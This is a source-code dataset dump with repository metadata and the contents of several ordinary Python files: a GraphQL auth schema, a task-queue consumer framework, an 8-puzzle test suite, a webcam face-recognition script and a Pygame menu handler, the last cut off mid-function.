blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
81fe488a948e2e3eda7a34ae6ffb201f9dc4fae0 | f4552a1e841b54f5f9ed414bc1f2cae1ab6f6adc | /quickstart/quickstart/schema.py | 7c660ac172335215f20504ec878a947dd5d33fee | [
"MIT"
] | permissive | hirokgreen/django-graphql-auth | 9b2a3d09691d0267a48a6cbefe7e49596be823fc | 1d2c745ca4ff189eafaeaf310088797243ae88cd | refs/heads/master | 2021-01-04T08:16:53.447706 | 2020-02-12T13:44:53 | 2020-02-12T13:44:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | # quickstart.schema.py
import graphene
from graphql_auth.schema import UserQuery
from graphql_auth import mutations
class AuthMutation(graphene.ObjectType):
register = mutations.Register.Field()
verify_account = mutations.VerifyAccount.Field()
resend_activation_email = mutations.ResendActivationEmail.Field()
send_password_reset_email = mutations.SendPasswordResetEmail.Field()
password_reset = mutations.PasswordReset.Field()
password_change = mutations.PasswordChange.Field()
archive_account = mutations.ArchiveAccount.Field()
delete_account = mutations.DeleteAccount.Field()
update_account = mutations.UpdateAccount.Field()
send_secondary_email_activation = mutations.SendSecondaryEmailActivation.Field()
verify_secondary_email = mutations.VerifySecondaryEmail.Field()
swap_emails = mutations.SwapEmails.Field()
# django-graphql-jwt authentication
# with some extra features
token_auth = mutations.ObtainJSONWebToken.Field()
verify_token = mutations.VerifyToken.Field()
refresh_token = mutations.RefreshToken.Field()
revoke_token = mutations.RevokeToken.Field()
class Query(UserQuery, graphene.ObjectType):
pass
class Mutation(AuthMutation, graphene.ObjectType):
pass
schema = graphene.Schema(query=Query, mutation=Mutation)
| [
"pedrobermoreira@gmail.com"
] | pedrobermoreira@gmail.com |
837eb31dcfcbcdeb39de0bda4bcad87c80626d95 | 993060167ec652fb3cb0c6e0c1da12ba3759ae47 | /function_scheduling_distributed_framework/consumers/base_consumer.py | 60e5c103607c25e878b526726379c9c16f9ad371 | [
"Apache-2.0"
] | permissive | Amua/distributed_framework | f0f85fbcf813991cbc819b28a3309efd8aec320f | 0be0b18f9c494788f8ae65c69863c003988c04ec | refs/heads/master | 2020-07-02T07:30:01.791185 | 2019-08-09T08:11:55 | 2019-08-09T08:11:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,055 | py | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:11
import abc
import atexit
import copy
import time
import traceback
from collections import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
from pymongo.errors import PyMongoError
from function_scheduling_distributed_framework.concurrent_pool.bounded_threadpoolexcutor import BoundedThreadPoolExecutor
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, check_evenlet_monkey_patch, CustomEventletPoolExecutor
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, GeventPoolExecutor, check_gevent_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_threadpool_executor import CustomThreadPoolExecutor, check_not_monkey
from function_scheduling_distributed_framework.consumers.redis_filter import RedisFilter
from function_scheduling_distributed_framework.factories.publisher_factotry import get_publisher
from function_scheduling_distributed_framework.utils import LoggerLevelSetterMixin, LogManager, decorators, nb_print, LoggerMixin
from function_scheduling_distributed_framework.utils import time_util
def delete_keys_and_return_new_dict(dictx: dict, keys: list):
dict_new = copy.copy(dictx) # 主要是去掉一级键 publish_time,浅拷贝即可。
for dict_key in keys:
try:
dict_new.pop(dict_key)
except KeyError:
pass
return dict_new
class ExceptionForRetry(Exception):
"""为了重试的,抛出错误。只是定义了一个子类,用不用都可以"""
class ExceptionForRequeue(Exception):
"""框架检测到此错误,重新放回队列中"""
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
time_interval_for_check_do_not_run_time = 60
BROKER_KIND = None
@property
@decorators.synchronized
def publisher_of_same_queue(self):
if not self._publisher_of_same_queue:
self._publisher_of_same_queue = get_publisher(self._queue_name, broker_kind=self.BROKER_KIND)
if self._msg_expire_senconds:
self._publisher_of_same_queue.set_is_add_publish_time()
return self._publisher_of_same_queue
@classmethod
def join_shedual_task_thread(cls):
"""
:return:
"""
"""
def ff():
RabbitmqConsumer('queue_test', consuming_function=f3, threads_num=20, msg_schedule_time_intercal=2, log_level=10, logger_prefix='yy平台消费', is_consuming_function_use_multi_params=True).start_consuming_message()
RabbitmqConsumer('queue_test2', consuming_function=f4, threads_num=20, msg_schedule_time_intercal=4, log_level=10, logger_prefix='zz平台消费', is_consuming_function_use_multi_params=True).start_consuming_message()
AbstractConsumer.join_shedual_task_thread() # 如果开多进程启动消费者,在linux上需要这样写下这一行。
if __name__ == '__main__':
[Process(target=ff).start() for _ in range(4)]
"""
ConcurrentModeDispatcher.join()
def __init__(self, queue_name, *, consuming_function: Callable = None, function_timeout=0, threads_num=50, specify_threadpool=None, concurrent_mode=1,
max_retry_times=3, log_level=10, is_print_detail_exception=True, msg_schedule_time_intercal=0.0, msg_expire_senconds=0,
logger_prefix='', create_logger_file=True, do_task_filtering=False, is_consuming_function_use_multi_params=True,
is_do_not_run_by_specify_time_effect=False, do_not_run_by_specify_time=('10:00:00', '22:00:00'), schedule_tasks_on_main_thread=False):
"""
:param queue_name:
:param consuming_function: 处理消息的函数。
:param function_timeout : 超时秒数,函数运行超过这个时间,则自动杀死函数。为0是不限制。
:param threads_num:
:param specify_threadpool:使用指定的线程池,可以多个消费者共使用一个线程池,不为None时候。threads_num失效
:param concurrent_mode:并发模式,暂时支持 线程 、gevent、eventlet三种模式。 1线程 2 gevent 3 evenlet
:param max_retry_times:
:param log_level:
:param is_print_detail_exception:
:param msg_schedule_time_intercal:消息调度的时间间隔,用于控频
:param logger_prefix: 日志前缀,可使不同的消费者生成不同的日志
:param create_logger_file : 是否创建文件日志
:param do_task_filtering :是否执行基于函数参数的任务过滤
:is_consuming_function_use_multi_params 函数的参数是否是传统的多参数,不为单个body字典表示多个参数。
:param is_do_not_run_by_specify_time_effect :是否使不运行的时间段生效
:param do_not_run_by_specify_time :不运行的时间段
:param schedule_tasks_on_main_thread :直接在主线程调度任务,意味着不能直接在当前主线程同时开启两个消费者。
"""
self._queue_name = queue_name
self.queue_name = queue_name # 可以换成公有的,免得外部访问有警告。
self.consuming_function = consuming_function
self._function_timeout = function_timeout
self._threads_num = threads_num
self._specify_threadpool = specify_threadpool
self._threadpool = None # 单独加一个检测消息数量和心跳的线程
self._concurrent_mode = concurrent_mode
self._max_retry_times = max_retry_times
self._is_print_detail_exception = is_print_detail_exception
self._msg_schedule_time_intercal = msg_schedule_time_intercal if msg_schedule_time_intercal > 0.001 else 0.001
self._msg_expire_senconds = msg_expire_senconds
if self._concurrent_mode not in (1, 2, 3):
raise ValueError('设置的并发模式不正确')
self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
self._logger_prefix = logger_prefix
self._log_level = log_level
if logger_prefix != '':
logger_prefix += '--'
logger_name = f'{logger_prefix}{self.__class__.__name__}--{self._concurrent_mode_dispatcher.concurrent_name}--{queue_name}'
# nb_print(logger_name)
self.logger = LogManager(logger_name).get_logger_and_add_handlers(log_level, log_filename=f'{logger_name}.log' if create_logger_file else None)
self.logger.info(f'{self.__class__} 被实例化')
self._do_task_filtering = do_task_filtering
self._redis_filter_key_name = f'filter:{queue_name}'
self._redis_filter = RedisFilter(self._redis_filter_key_name)
self._is_consuming_function_use_multi_params = is_consuming_function_use_multi_params
self._lock_for_pika = Lock()
self._execute_task_times_every_minute = 0 # 每分钟执行了多少次任务。
self._lock_for_count_execute_task_times_every_minute = Lock()
self._current_time_for_execute_task_times_every_minute = time.time()
self._msg_num_in_broker = 0
self._last_timestamp_when_has_task_in_queue = 0
self._last_timestamp_print_msg_num = 0
self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
self._do_not_run_by_specify_time = do_not_run_by_specify_time # 可以设置在指定的时间段不运行。
self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
self.stop_flag = False
self._publisher_of_same_queue = None
@property
@decorators.synchronized
def threadpool(self):
return self._concurrent_mode_dispatcher.build_pool()
def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True):
"""间隔一段时间,一直循环运行某个方法的装饰器
:param time_sleep :循环的间隔时间
:param is_display_detail_exception
:param exit_if_function_run_sucsess :如果成功了就退出循环
"""
def _keep_circulating(func):
# noinspection PyBroadException
@wraps(func)
def __keep_circulating(*args, **kwargs):
while 1:
if self.stop_flag:
break
try:
result = func(*args, **kwargs)
if exit_if_function_run_sucsess:
return result
except Exception as e:
msg = func.__name__ + ' 运行出错\n ' + traceback.format_exc(limit=10) if is_display_detail_exception else str(e)
self.logger.error(msg)
finally:
time.sleep(time_sleep)
return __keep_circulating
return _keep_circulating
def start_consuming_message(self):
self.logger.warning(f'开始消费 {self._queue_name} 中的消息')
# self.threadpool.submit(decorators.keep_circulating(20)(self.check_heartbeat_and_message_count))
self.threadpool.submit(self.keep_circulating(20)(self.check_heartbeat_and_message_count))
if self._schedule_tasks_on_main_thread:
# decorators.keep_circulating(1)(self._shedual_task)()
self.keep_circulating(1)(self._shedual_task)()
else:
# t = Thread(target=decorators.keep_circulating(1)(self._shedual_task))
self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
@abc.abstractmethod
def _shedual_task(self):
raise NotImplementedError
def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times=0, ):
if self._do_task_filtering and self._redis_filter.check_value_exists(kw['body']): # 对函数的参数进行检查,过滤已经执行过并且成功的任务。
self.logger.info(f'redis的 [{self._redis_filter_key_name}] 键 中 过滤任务 {kw["body"]}')
self._confirm_consume(kw)
return
with self._lock_for_count_execute_task_times_every_minute:
self._execute_task_times_every_minute += 1
if time.time() - self._current_time_for_execute_task_times_every_minute > 60:
self.logger.info(
f'一分钟内执行了 {self._execute_task_times_every_minute} 次函数 [ {self.consuming_function.__name__} ] ,预计'
f'还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / self._execute_task_times_every_minute * 60)} 时间'
f'才能执行完成 {self._msg_num_in_broker}个剩余的任务 ')
self._current_time_for_execute_task_times_every_minute = time.time()
self._execute_task_times_every_minute = 0
if current_retry_times < self._max_retry_times + 1:
# noinspection PyBroadException
t_start = time.time()
try:
function_run = self.consuming_function if self._function_timeout == 0 else self._concurrent_mode_dispatcher.timeout_deco(self._function_timeout)(self.consuming_function)
if self._is_consuming_function_use_multi_params: # 消费函数使用传统的多参数形式
function_run(**delete_keys_and_return_new_dict(kw['body'], ['publish_time', 'publish_time_format']))
else:
function_run(delete_keys_and_return_new_dict(kw['body'], ['publish_time', 'publish_time_format'])) # 消费函数使用单个参数,参数自身是一个字典,由键值对表示各个参数。
self._confirm_consume(kw)
if self._do_task_filtering:
self._redis_filter.add_a_value(kw['body']) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
# self.logger.debug(f'{self._concurrent_mode_dispatcher.get_concurrent_info()} 函数 {self.consuming_function.__name__} '
# f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 【 {kw["body"]} 】')
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 【 {kw["body"]} 】。 {self._concurrent_mode_dispatcher.get_concurrent_info()}')
except Exception as e:
if isinstance(e, (PyMongoError, ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e}')
return self._requeue(kw)
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 【 {kw["body"]} 】 \n 原因是 {type(e)} {e} ', exc_info=self._is_print_detail_exception)
self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times + 1)
else:
self.logger.critical(f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self._max_retry_times} 后,仍然失败, 入参是 【 {kw["body"]} 】') # 错得超过指定的次数了,就确认消费了。
self._confirm_consume(kw)
@abc.abstractmethod
def _confirm_consume(self, kw):
"""确认消费"""
raise NotImplementedError
# noinspection PyUnusedLocal
def check_heartbeat_and_message_count(self):
self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
if time.time() - self._last_timestamp_print_msg_num > 60:
self.logger.info(f'[{self._queue_name}] 队列中还有 [{self._msg_num_in_broker}] 个任务')
self._last_timestamp_print_msg_num = time.time()
if self._msg_num_in_broker != 0:
self._last_timestamp_when_has_task_in_queue = time.time()
return self._msg_num_in_broker
@abc.abstractmethod
def _requeue(self, kw):
"""重新入队"""
raise NotImplementedError
def _submit_task(self, kw):
if self._judge_is_daylight():
self._requeue(kw)
time.sleep(self.time_interval_for_check_do_not_run_time)
return
if self._msg_expire_senconds != 0 and time.time() - self._msg_expire_senconds > kw['body']['publish_time']:
self.logger.warning(f'消息发布时戳是 {kw["body"]["publish_time"]} {kw["body"].get("publish_time_format", "")},距离现在 {round(time.time() - kw["body"]["publish_time"], 4)} 秒 ,'
f'超过了指定的 {self._msg_expire_senconds} 秒,丢弃任务')
self._confirm_consume(kw)
return 0
self.threadpool.submit(self._run_consuming_function_with_confirm_and_retry, kw)
time.sleep(self._msg_schedule_time_intercal)
def _judge_is_daylight(self):
if self._is_do_not_run_by_specify_time_effect and self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]:
self.logger.warning(f'现在时间是 {time_util.DatetimeConverter()} ,现在时间是在 {self._do_not_run_by_specify_time} 之间,不运行')
return True
def __str__(self):
return f'队列为 {self.queue_name} 函数为 {self.consuming_function} 的消费者'
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
schedulal_thread_to_be_join = []
concurrent_mode = None
schedual_task_always_use_thread = False
def __init__(self, consumerx: AbstractConsumer):
self.consumer = consumerx
if self.__class__.concurrent_mode is not None and self.consumer._concurrent_mode != self.__class__.concurrent_mode:
raise ValueError('同一解释器中不可以设置两种并发类型')
self._concurrent_mode = self.__class__.concurrent_mode = self.consumer._concurrent_mode
concurrent_name = ''
self.timeout_deco = None
if self._concurrent_mode == 1:
concurrent_name = 'thread'
self.timeout_deco = decorators.timeout
elif self._concurrent_mode == 2:
concurrent_name = 'gevent'
self.timeout_deco = gevent_timeout_deco
elif self._concurrent_mode == 3:
concurrent_name = 'evenlet'
self.timeout_deco = evenlet_timeout_deco
self.concurrent_name = concurrent_name
self.logger.warning(f'{self.consumer} 设置并发模式为 {self.concurrent_name}')
def build_pool(self):
if self.consumer._threadpool:
return self.consumer._threadpool
pool_type = None # 是按照ThreadpoolExecutor写的三个鸭子类,公有方法名和功能写成完全一致,可以互相替换。
if self._concurrent_mode == 1:
pool_type = CustomThreadPoolExecutor
# pool_type = BoundedThreadPoolExecutor
check_not_monkey()
elif self._concurrent_mode == 2:
pool_type = GeventPoolExecutor
check_gevent_monkey_patch()
elif self._concurrent_mode == 3:
pool_type = CustomEventletPoolExecutor
check_evenlet_monkey_patch()
self.consumer._threadpool = self.consumer._specify_threadpool if self.consumer._specify_threadpool else pool_type(self.consumer._threads_num + 1) # 单独加一个检测消息数量和心跳的线程
self.logger.warning(f'{self.concurrent_name} {self.consumer._threadpool}')
return self.consumer._threadpool
def schedulal_task_with_no_block(self):
if self.schedual_task_always_use_thread:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
self.__class__.schedulal_thread_to_be_join.append(t)
t.start()
else:
if self._concurrent_mode == 1:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
self.__class__.schedulal_thread_to_be_join.append(t)
t.start()
elif self._concurrent_mode == 2:
g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
self.__class__.schedulal_thread_to_be_join.append(g)
elif self._concurrent_mode == 3:
g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
self.__class__.schedulal_thread_to_be_join.append(g)
atexit.register(self.join)
@classmethod
def join(cls):
nb_print((cls.schedulal_thread_to_be_join, len(cls.schedulal_thread_to_be_join), '模式:', cls.concurrent_mode))
if cls.schedual_task_always_use_thread:
for t in cls.schedulal_thread_to_be_join:
nb_print(t)
t.join()
else:
if cls.concurrent_mode == 1:
for t in cls.schedulal_thread_to_be_join:
nb_print(t)
t.join()
elif cls.concurrent_mode == 2:
# cls.logger.info()
nb_print(cls.schedulal_thread_to_be_join)
gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
elif cls.concurrent_mode == 3:
for g in cls.schedulal_thread_to_be_join:
# eventlet.greenthread.GreenThread.
nb_print(g)
g.wait()
def get_concurrent_info(self):
concurrent_info = ''
if self._concurrent_mode == 1:
concurrent_info = f'[{threading.current_thread()} {threading.active_count()}]'
elif self._concurrent_mode == 2:
concurrent_info = f'[{gevent.getcurrent()} {threading.active_count()}]'
elif self._concurrent_mode == 3:
# noinspection PyArgumentList
concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
return concurrent_info
def wait_for_possible_has_finish_all_tasks(queue_name: str, minutes: int, send_stop_to_broker=0, broker_kind: int = 0, ):
"""
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
:param queue_name: 队列名字
:param minutes: 连续多少分钟没任务就判断为消费已完成
:param send_stop_to_broker :发送停止标志到中间件,这回导致消费退出循环调度。
:param broker_kind: 中间件种类
:return:
"""
if minutes <= 1:
raise ValueError('疑似完成任务,判断时间最少需要设置为2分钟内,最好是是10分钟')
pb = get_publisher(queue_name, broker_kind=broker_kind)
no_task_time = 0
while 1:
# noinspection PyBroadException
try:
message_count = pb.get_message_count()
except Exception as e:
nb_print(e)
message_count = -1
if message_count == 0:
no_task_time += 30
else:
no_task_time = 0
time.sleep(30)
if no_task_time > minutes * 60:
break
if send_stop_to_broker:
pb.publish({'stop': 1})
pb.close()
| [
"909686719@qq.com"
] | 909686719@qq.com |
9460ed333c68286b1b8586ae62dfef6f5a885477 | c51346bab049a960d76f9e2e243523840bf5bd7a | /driver_testsuite.py | 406a7e5bec66ecc570edc64504cdcee78201bbc4 | [] | no_license | DaFaYo/8-puzzle | 9d90fa8f23d49f718411280d4a8a4a0fd2d360d9 | 8a2a69e00ee9ea5d705cf8427114d1c8d62f276d | refs/heads/master | 2021-07-07T05:51:12.230212 | 2017-10-04T10:47:49 | 2017-10-04T10:47:49 | 105,752,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,199 | py | """
A simple testing suite for 8-puzzle, 15-puzzle, 24-puzzle, etc.
"""
import poc_simpletest
import time
total_time = 0.0
def timeTest(testName, timeElapsed):
global total_time
total_time += timeElapsed
return "%s. Time elapsed: %.3f s." % (testName, timeElapsed)
def run_test(solver_class, manhattan_func):
# -----------------------------------------------------------
# test manhattan distance function with 8-puzzle
# -----------------------------------------------------------
suite = poc_simpletest.TestSuite()
function = 'manhattan distance'
start = '7,2,4,5,0,6,8,3,1'
goal = '0,1,2,3,4,5,6,7,8'
print 'Goal:', goal
testName = "Test #1: function: %s, start: %s" % (function, start)
start = map(int, start.split(","))
goal = map(int, goal.split(","))
dist = manhattan_func(start, goal, 3)
suite.run_test(dist, 18, testName)
print testName
start = '1,2,5,3,4,0,6,7,8'
testName = "Test #2: function: %s, start: %s" % (function, start)
start = map(int, start.split(","))
dist = manhattan_func(start, goal, 3)
suite.run_test(dist, 3, testName)
print testName
start = '3,1,2,0,4,5,6,7,8'
testName = "Test #3: function: %s, start: %s" % (function, start)
start = map(int, start.split(","))
dist = manhattan_func(start, goal, 3)
suite.run_test(dist, 1, testName)
print testName
start = '8,6,4,2,1,3,5,7,0'
testName = "Test #4: function: %s, start: %s" % (function, start)
start = map(int, start.split(","))
dist = manhattan_func(start, goal, 3)
suite.run_test(dist, 18, testName)
print testName
start = '8,4,0,3,7,1,6,2,5'
testName = "Test #5: function: %s, start: %s" % (function, start)
start = map(int, start.split(","))
dist = manhattan_func(start, goal, 3)
suite.run_test(dist, 12, testName)
print testName
##############
# TEST SOLVER
##############
#solve the 8-puzzle
goal = '0,1,2,3,4,5,6,7,8'
# -------------------------------------------------------------
# test solver with 8-puzzle with breadth-first-search algorithm
# -------------------------------------------------------------
board = '3,1,2,0,4,5,6,7,8'
testName = "Test #6 t/m #8: sanity checks, board: %s" % (board)
print testName
solver = solver_class('bfs', board)
solver.goalTest(goal)
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
solver = solver_class('dfs', board)
solver.goalTest(goal)
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
solver = solver_class('ast', board)
solver.goalTest(goal)
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
method = 'bfs'
board = '1,2,5,3,4,0,6,7,8'
testName = "Test #9: method: %s, board: %s" % (method, board)
# time the solver
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
print timeTest(testName, (end - start))
method = 'ast'
board = '1,2,5,3,4,0,6,7,8'
testName = "Test #10: method: %s, board: %s" % (method, board)
# time the solver
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
print timeTest(testName, (end - start))
board = '6,3,4,7,1,8,2,0,5'
testName = "Test #11: method: %s, board: %s" % (method, board)
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Left, Up, Up, Right, Down, Down, Right, Up, ' \
'Left, Down, Left, Up, Up, Right, Right, Down, Left, Up, Left }', testName)
print timeTest(testName, (end - start))
board = '4,5,6,1,2,0,8,7,3'
testName = "Test #12: method: %s, board: %s" % (method, board)
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Down, Down, Left, Up, Right, Right, ' \
'Down, Left, Up, Left, Down, Right, Up, Right, Up, Left, Left, Down, Right, Up, Left }', testName)
print timeTest(testName, (end - start))
# -----------------------------------------------------------
# test solver with 8-puzzle with depth-first-search algorithm
# -----------------------------------------------------------
method = 'dfs'
board = '1,2,5,3,4,0,6,7,8'
testName = "Test #13: method: %s, board: %s" % (method, board)
# time the solver
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
print timeTest(testName, (end - start))
# -----------------------------------------------------------
# test solver with 8-puzzle with A* algorithm
# -----------------------------------------------------------
method = 'ast'
board = '6,1,8,4,0,2,7,3,5'
testName = "Test #14: method: %s, board: %s" % (method, board)
# time the solver
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Down, Right, Up, Up, Left, Down, Right, Down, ' \
'Left, Up, Left, Up, Right, Right, Down, Down, Left, Left, Up, Up }', testName)
print timeTest(testName, (end - start))
# -----------------------------------------------------------
# test solver with 8-puzzle with A* algorithm
# -----------------------------------------------------------
method = 'ast'
board = '6,3,4,7,1,8,2,0,5'
testName = "Test #15: method: %s, board: %s" % (method, board)
# time the solver
start = time.time()
solver = solver_class(method, board)
solver.goalTest(goal)
end = time.time()
path = solver.get_path()
suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Left, Up, Up, Right, Down, Down, Right, Up, ' \
'Left, Down, Left, Up, Up, Right, Right, Down, Left, Up, Left }', testName)
print timeTest(testName, (end - start))
print
print "Total time: %.3f seconds." % (total_time)
suite.report_results()
| [
"rosahoetmer@MacBook-Pro-van-Rosa.local"
] | rosahoetmer@MacBook-Pro-van-Rosa.local |
478dcea69606ef521a881ced468c30ce6dbc92fc | 228d7661748502381e8a075c7604f7e289069499 | /store_img.py | d7916e1ea051d7a8364667e2cf0325bcbfdda643 | [] | no_license | pritul2/Face-Recognition | ba18f04083db86815bd66ced6c811e8141569dd3 | 5958e73356e31c6262b65b1ed44eda64f716cc10 | refs/heads/master | 2021-05-21T15:58:03.147498 | 2020-04-15T15:13:18 | 2020-04-15T15:13:18 | 252,706,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,784 | py | from keras import backend as K
import cv2
import tensorflow as tf
from keras.models import load_model
from mtcnn.mtcnn import MTCNN
import compare_file
def detect(img):
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
detector = MTCNN()
results = detector.detect_faces(img)
if len(results) == 0 :
return
if results[0]['confidence'] >= 0.5:
x1, y1, width, height = results[0]['box']
x1, y1 = abs(x1), abs(y1)
x2, y2 = x1 + width, y1 + height
if img is None:
return
img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)
img = extract(img,[x1-20,y1-20,x2+20,y2+20])
return img
return
def extract(img,coord):
img = img[coord[1]:coord[3],coord[0]:coord[2]]
if img is None:
print("line 26")
return
img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img = cv2.equalizeHist(img)
cv2.imwrite("1.png",img)
return img
def triplet_loss(y_true,y_pred,alpha = 0.3):
anchor = y_pred[0]
positive = y_pred[1]
negative = y_pred[2]
pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)
neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)
basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)
loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0))
return loss
def vid_capture():
model = load_model('models/model.h5', custom_objects={'triplet_loss': triplet_loss})
cap = cv2.VideoCapture(0)
K.set_image_data_format('channels_last')
while cap.isOpened():
ret,frame = cap.read()
if ret:
frame = detect(frame)
if frame is None:
continue
frame = cv2.resize(frame,(100,100))
if frame is None:
continue
cv2.imshow("frame",frame)
cv2.waitKey(1)
name = compare_file.compare(model)
print(name)
if name is None or name == " " or name == "unknown":
print("unknown")
#return frame
vid_capture() | [
"pritul.dave@gmail.com"
] | pritul.dave@gmail.com |
9a5c036ea6011ce1a883d71cf8ba4d5d725df6fa | 16bb58cd85a0e46b60d43b52bc51149f9fa6e6d4 | /events.py | 1c51f89f12a6571683ecc3c5d15baa162d606d81 | [] | no_license | sunnad99/Fantasy-Ludo-Game | f86e89103b14bf9915de3a0d6d91ff62164484fe | 8b0b29d92a704aca36240011fa3629ca2c5c6e1e | refs/heads/master | 2023-06-15T17:23:22.263237 | 2021-07-08T11:52:17 | 2021-07-08T11:52:17 | 287,137,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,855 | py | import pygame
import time
import sys
class Events:
def __init__(self, game):
self.game = game
self.settings = self.game.settings
def check_mouse_main_menu_event(self, event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_main_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.start_game.collidepoint(self.mouse_pos):
self.game.menu.start_game_color = self.settings.DARK_RED
else:
self.game.menu.start_game_color = self.settings.WHITE
if self.game.menu.exit_game.collidepoint(self.mouse_pos):
self.game.menu.exit_game_color = self.settings.DARK_RED
else:
self.game.menu.exit_game_color = self.settings.WHITE
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_main_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.start_game.collidepoint(self.mouse_pos):
self.game.menu.is_main_menu = False
if state_of_buttons[0] == 1 and self.game.menu.exit_game.collidepoint(self.mouse_pos):
sys.exit()
def check_mouse_second_menu_event(self,event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_2nd_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.player_2.collidepoint(self.mouse_pos):
self.game.menu.two_player_color = self.settings.DARK_RED
else:
self.game.menu.two_player_color = self.settings.BLACK
if self.game.menu.player_3.collidepoint(self.mouse_pos):
self.game.menu.three_player_color = self.settings.DARK_RED
else:
self.game.menu.three_player_color = self.settings.BLACK
if self.game.menu.player_4.collidepoint(self.mouse_pos):
self.game.menu.four_player_color = self.settings.DARK_RED
else:
